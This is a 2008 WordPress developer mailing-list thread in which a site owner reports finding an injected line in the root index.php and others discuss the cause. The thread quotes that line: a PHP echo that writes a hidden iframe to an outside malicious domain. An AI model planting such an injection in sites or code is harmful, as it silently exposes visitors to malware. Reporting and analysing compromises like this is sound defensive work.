[wp-hackers] Re: XSS vuln in wordpress 2.7 ?
god.dreams at gmail.com
Mon Dec 22 19:26:31 GMT 2008
Just to chime in on the fun, you're not the only one as a quick google
search pulls a lot of people with similar posts.
As well shows the (supposed) owner is in Estonia, which oddly enough
I've seen a lot of failed hack attempts on my site coming from Estonia
(I think, maybe it was algeria?)
Do you have mod_security enabled? No luck on pulling down the
offender's IP, and the site itself seems to do nothing but host a
Best of luck turning this around...
> Message: 7
> Date: Mon, 22 Dec 2008 20:39:49 +0200
> From: madalin <niladam at gmail.com>
> Subject: Re: [wp-hackers] XSS vuln in wordpress 2.7 ?
> To: wp-hackers at lists.automattic.com
> <df809b110812221039y29f116f1k5238dfb209d3f30a at mail.gmail.com>
> Content-Type: text/plain; charset=UTF-8
> Yes that's exactly what i am saying. Here is my index.php:
> * Front to the WordPress application. This file doesn't do anything, but loads
> * wp-blog-header.php which does and tells WordPress to load the theme.
> * @package WordPress
> * Tells WordPress to load the WordPress theme and output it.
> * @var bool
> define('WP_USE_THEMES', true);
> /** Loads the WordPress Environment and Template */
> // echo "<iframe src=\"http://thedeadpit.com/?click=17470781\" width=1
> height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
> I've commented the line so i can keep it for future investigations.
> Our password have NOT been compromised as the only logins are from my
> host and my friend's host. It could be an older version of a plugin
> However, i had to report this as maybe someone will encounter the same
> problem or so.
> On Mon, Dec 22, 2008 at 8:36 PM, Stephen Rider
> <wp-hackers at striderweb.com> wrote:
>> Well, wait. he said: "i found [it in] my blog's index.php (not theme's
>> Does this mean it shows up in the final rendered page, but not in the
>> theme's file? In that case, it's being added dynamically. The link is not
>> written in the theme.
>> Just trying to clarify. I'm no security guru... (IANASG)
>> On Dec 22, 2008, at 11:33 AM, Joost de Valk wrote:
>>> If the file is writable for the webserver and file access is enabled on
>>> the webserver: yes.
>>> On Dec 22, 2008, at 18:31, Dan Gayle <dangayle at gmail.com> wrote:
>>>> Wow. That's nasty, and malicious. Could a plugin do that?
>>>> On Dec 22, 2008, at 9:27 AM, madalin wrote:
>>>>> For some reason i found my blog's index.php (not theme's index.php)
>>>>> with the following piece of code right before the ?>
>>>>> echo "<iframe src=\"http://thedeadpit.com/?click=17470781\" width=1
>>>>> height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
>>>>> I tried looking at the logs. No luck. The file's permisions look like
>>>>> -rw-r--r-- 1 madalin madalin 557 Dec 22 15:50
>> wp-hackers mailing list
>> wp-hackers at lists.automattic.com
> wp-hackers mailing list
> wp-hackers at lists.automattic.com
> End of wp-hackers Digest, Vol 47, Issue 66
grand central: (614) 654-4296
More information about the wp-hackers